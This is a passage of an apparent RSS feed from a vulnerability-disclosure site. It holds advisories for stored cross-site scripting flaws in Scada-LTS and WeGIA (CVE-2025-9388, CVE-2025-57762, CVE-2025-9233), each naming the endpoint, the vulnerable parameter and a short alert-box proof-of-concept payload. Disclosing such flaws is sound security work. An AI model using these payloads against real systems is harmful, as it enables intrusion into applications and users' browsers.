&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#34;Watchlist&amp;amp;#34;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9388/image.png&amp;#34;
	width=&amp;#34;819&amp;#34;
	height=&amp;#34;421&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9388/image_hu_c2cefdeb719d4d72.png 480w, /p/cve-2025-9388/image_hu_50dc5afcdb9bf712.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;194&amp;#34;
		data-flex-basis=&amp;#34;466px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9388.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9388.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 24 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-57762</title>
        <link>https://www.cvehunters.com/p/cve-2025-57762/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-57762/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-57762-cross-site-scripting-xss-stored-endpoint-dependente_docdependentephp-parameter-name&amp;#34;&amp;gt;CVE-2025-57762: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-57762&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-57762&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-57762-cross-site-scripting-xss-stored-endpoint-dependente_docdependentephp-parameter-name&amp;#34;&amp;gt;CVE-2025-57762: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-57762&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-57762&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-57762/image.png&amp;#34;
	width=&amp;#34;1273&amp;#34;
	height=&amp;#34;849&amp;#34;
	srcset=&amp;#34;/p/cve-2025-57762/image_hu_79c930746da3382f.png 480w, /p/cve-2025-57762/image_hu_dca868afd0ec9e1d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;149&amp;#34;
		data-flex-basis=&amp;#34;359px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-494r-43f3-p828&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-494r-43f3-p828&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 21 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9233</title>
        <link>https://www.cvehunters.com/p/cve-2025-9233/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9233/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9233-cross-site-scripting-xss-stored-endpoint-view_editshtm-parameter-name&amp;#34;&amp;gt;CVE-2025-9233: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9233&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9233&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9233-cross-site-scripting-xss-stored-endpoint-view_editshtm-parameter-name&amp;#34;&amp;gt;CVE-2025-9233: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9233&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9233&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;view_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#34;View1&amp;amp;#34;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9233/image.png&amp;#34;
	width=&amp;#34;917&amp;#34;
	height=&amp;#34;424&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9233/image_hu_5fdba5b40e1e1605.png 480w, /p/cve-2025-9233/image_hu_77b76c01a046725a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;519px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9233.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9233.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
